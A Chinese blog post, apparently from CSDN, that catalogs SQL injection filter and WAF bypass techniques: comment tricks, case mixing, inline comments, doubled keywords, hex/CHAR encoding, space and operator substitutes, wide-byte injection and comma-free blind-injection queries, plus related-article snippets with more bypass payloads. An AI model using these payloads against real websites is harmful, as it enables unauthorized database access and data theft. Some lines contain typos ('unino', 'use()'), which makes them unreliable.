web安全-sql注入-常见绕过

已于 2024-03-30 15:44:14 修改
阅读量39 收藏 1
点赞数 1
文章标签: web安全 安全
于 2024-03-28 20:21:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80137226/article/details/137121404
版权

一,注释符绕过

1)-- 注释内容

2)# 注释内容

3)/* 注释内容 */

二,大小写绕过

用于大小写不敏感

列如

 Union SElect 1,2

三,内联注释绕过

当一些关键语句被过滤时,内联注释就是把一些特有的仅在 mysql 上的语句放在 /*!  */中,这样这些语句如果在其它数据库中是不会被执行,但在 mysql 中会执行。

?id=1' union /*!select*/ 1,2

四,双写关键词绕过

有些会将关键词require()将关键词过滤,所以进行双写

union seselectlect 1,2
#会将中间的 select 过滤掉之后将 se 与 lect 合并形成新的select

五,编码绕过

1,十六进制绕过

?id=1' unino select 1,group_concat(column_name) from information_schema.columns where table_name=0x61645F6C696E6B

这里演示的是引号被过滤了,表名用十六进制可以直接引用

2,ascii绕过

就是使用ascii 编码来替换需要引号引用的内容

Test =CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

六,空格过滤绕过

可代替空格的方式:

1,/**/

2,()

3,`

4,tab

union/**/select/**/1,2
 
select(passwd)from(users) # 注意括号中不能含有 *

七,and,or,xor,not被过滤

and=&&,or=||,xor=|,not=!;

八,等号=被过滤

like,rlike

select * from users where id like 1;

2)regexp

MySQL 中使用 REGEXP 操作符来进行正则表达式匹配

eg:

UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name regexp 'users'

九,过滤引号绕过

1)使用编码绕过(16进制/ascii)

eg:

?id=1' unino select 1,group_concat(column_name) from information_schema.columns where table_name=0x61645F6C696E6B

这里演示的是当引号被过滤后,可以使用十六进制来写表名这样在调用时表名会被直接调用使用。

2)宽字节注入

常用在 web 应用使用的字符集为 GBK 时,并且过滤了引号(一般为被函数转义的的过滤),就可以试试宽字节。

eg:

%df%27 union select 1,2,3

十,过滤了逗号

1) 过滤了逗号,并且只能盲注,在取子串的几个函数中,有一个替代逗号的方法就是使用 from  for ,其中 pos 代表从 pos 个开始读取 len 长度的子串

eg:常规写法 select substr ("string",1,3)

若过滤了逗号,可以使用 from  for 来取代 select substr ("string" from 1 for 3)

select ascii (substr(user() from 1 for 1)) > 110

2),join关键词绕过

适用于联合查询

select * from users union select * from (select 1)a join (select 2)b join(select 3)c

3)使用 like 关键字,适用于 substr () 等提取子串的函数中的逗号(适用于盲注)

select user() like "r%"

 相当于 select ascii(substr(use(),1))=114

 4)使用 offset 关键字,适用于 limit 中的逗号被过滤的情况

select * from users limit 1 offset 2

 上式等价于 select * from users limit 2,1

不同点在于使用逗号是从行号在前进行截取,使用 offset 关键字是行号在后进行截取。

5)

2301_80137226
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB漏洞-SQL注入之sqlmap绕过waf
xhscxj的博客
01-18 2775
静态资源 特定的静态资源后缀请求,常见的静态文件如(.js,.css,.jpg,.txt等),类似与白名单机制,waf为了检验的效率,不会去检验这样一些静态后缀名的请求 在网站目录后面加上x.txt,网站返回的数据不会受影响,这样waf就有可能不会去检查后面的参数,从而绕过。 爬虫白名单 当你去用工具扫描网站时访问的次数太频繁,如果网站waf设有流量资源防护,就会把你的ip列入黑名单。 但是为什么百度,谷歌等浏览器也属于爬虫,他们请求的时候不会被禁止访问 因为网站的waf设置了爬虫白名单,当它识别到use
第19天-WEB漏洞-SQL注入之SQLMAP绕过WAF
MCTSOG的博客
03-03 1836
在攻防实战,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便我们更灵活地去构造 Payload,从而可以和各种WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用。 数据库特性(补充) %23x%0aunion%23x%0Aselect%201,2,3 %20/!44509union/%23x%0aselect%201,2,3 id=1/**&id=-1%20union%20select%201,2,3%23*/ %20union%20all%23%0a%20select%20
网络安全---sql注入绕过
bffanfan的博客
01-04 1380
1.sql注入 概念:将恶意的sql查询或者添加语句插入到输入的参数,再在后台sql服务器解析形成攻击 原理:程序员没有遵循代码与数据分离原则,是用户数据作为代码执行 注释:#或者–空格是单行注释,/**/是内联注释 条件:用户可以控制数据的输入 ​ 原本要运行的代码拼接了用户的输入并运行 sql注入产生原因:web服务器向数据访问层发起sql请求,权限验证通过就执行sql语句。网站内部直接发送的sql语句请求一般不会有危险。但实际情况是需要结合用户输入的数据动态构造sql语句,如果用户输入的数据构造称恶
web安全-SQL注入-认识安全狗-WAF绕过常用方法以及示例
ran的博客
01-20 1551
特殊符号%00,部分 waf 遇到%00 截断,只能获取到前面的参数,无法获取到后面的有害参数输 入 , 从 而 导 致 Bypass。select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin。mysql 注释符有三种:#、/*...*/、-- ... (注意--后面有一个空格)// -- --+ # /**/ + :%00 /!Hex() bin() 等价于 ascii()
web十大漏洞--sql注入
m0_71907084的博客
10-30 1449
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
软件安全测试-Web安全测试详解-SQL注入
白天像蚂蚁一样工作,晚上像蝴蝶一样生活
12-11 957
SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。
Web的基本漏洞--SQL注入漏洞
尽欢的博客
05-31 3446
SQL注入介绍
Web漏洞-SQL注入(下)
Ays.Ie的博客
03-06 1738
web漏洞—SQL注入(下)
web安全SQL注入绕过技术(一)
Longwaer
02-23 2041
学习掌握SQL注入绕过技术,从而更好的用于渗透测试
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 1868
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
1、逻辑问题 2、性能问题 3、白名单
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
实验一:使用SQL注入绕过认证 一、实验目的 使用SQL注入绕过认证 熟悉掌握常见绕过方式 二、实验内容 本实验使用SQL注入绕过认证,其包含注释符绕过、大小写绕过、特殊编码绕过、内联注释绕过等方式。 三、实验...
Web安全SQL注入精讲视频.zip
04-16
1-1 SQL注入的业务场景以及危害.mp4 1-2 真实网站SQL注入是怎么样的.mp4 1-3 SQL为什么有那么多分类.mp4 2-1 整型注入.mp4 2-10 SQL注入读写文件.mp4 2-2 字符型注入(单引号、双引号、括号).mp4 2-3 POST注入....
Web应用安全:使用SQL注入绕过认证.pptx
06-17
使用SQL注入绕过认证 使用SQL注入绕过认证 1、SQL注入分类 SQL注入类型 数字型注入 字符型注入 其他类型注入 使用SQL注入绕过认证 1、SQL注入分类 数字型注入 许多网页链接有类似 /users.php?id=1 的结构,基于此种...
Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统
05-01
SQL注入的典型用法是从数据库泄漏机密信息,绕过身份验证逻辑或向数据库添加未经授权的帐户。 此安全性可防止未经授权访问您的数据库,还可以防止没有适当权限的用户更改或删除您的数据。 恶意文本检测器,约束...
信息安全法规和标准
m0_62207482的博客
05-28 972
自行建设韵味的政府网站不放在境外;39、据《计算机场地安全要求(GB/T9361-2011)》,计算机机房的安全等级分为 A:计算机系统运行断后,会对国家安全、社会秩序、公共利益造成严重损害的对计算机机房的安全有严格的要求,有完善的计算机器机房安全措施 B级:计算机系统运行断后,会对国家安全、社会秩序、公共利益造成较大损害的计算机机房的安全有较严格的要求,有较完善的计算机机房安全措施 C级: 不属于A、B级的情况,对计算机机房的安全有基本的要求,有基本的计算机机房安全措施。
【网络安全的神秘世界】在win11搭建pikachu靶场
最新发布
weixin_54750312的博客
05-31 605
这个错误发生在mysql 5.7 版本及以上版本会出现的问题,在mysql5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准",很多从5.6升级到5.7时,为了语法兼容,大部分都会选择调整sql_mode,使其保持跟5.6一致,为了尽量兼容程序。访问http://pikachu/install.php,这是pikachu自带的初始化数据库的php文件。ok,重新访问首页(index.php),进行测试,成功解决。点击“安装/初始化”
web安全渗透测试工具篇(二):sqlmap常用命令和nmap常用命令
HACKONE的博客
05-26 192
这些选项可以用来创建用户自定义函数。--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
sql注入绕过waf
09-03
SQL注入攻击是一种常见的网络攻击方式,可以通过操纵应用程序输入来执行恶意的SQL语句。绕过WAF(Web应用程序防火墙)可以增加攻击成功的几率,但我无法提供关于如何绕过WAF的具体指导或支持任何非法行为。 然而,我可以提供一些有助于避免SQL注入攻击的一般性建议: 1. 使用参数化查询或预编译语句:使用参数化查询可以防止用户输入被误解为SQL代码的一部分。 2. 输入验证和过滤:对用户输入进行验证和过滤,确保输入的数据符合预期格式和类型,并且不包含可执行的SQL代码。 3. 最小权限原则:为数据库用户分配最小权限,限制其对数据库的访问范围,减少潜在攻击的影响范围。 4. 定期更新和维护:及时修补数据库软件的漏洞和安全问题,并定期更新数据库软件版本。 5. 安全审计日志:记录并监控数据库操作日志,及时发现异常或可疑活动。 请记住,这只是一些建议,安全性是一个复杂的问题,需要综合考虑应用程序的特定情况和最佳实践。如果您是一个开发者,建议您寻求专业的安全顾问或审计团队的帮助来确保您的应用程序安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值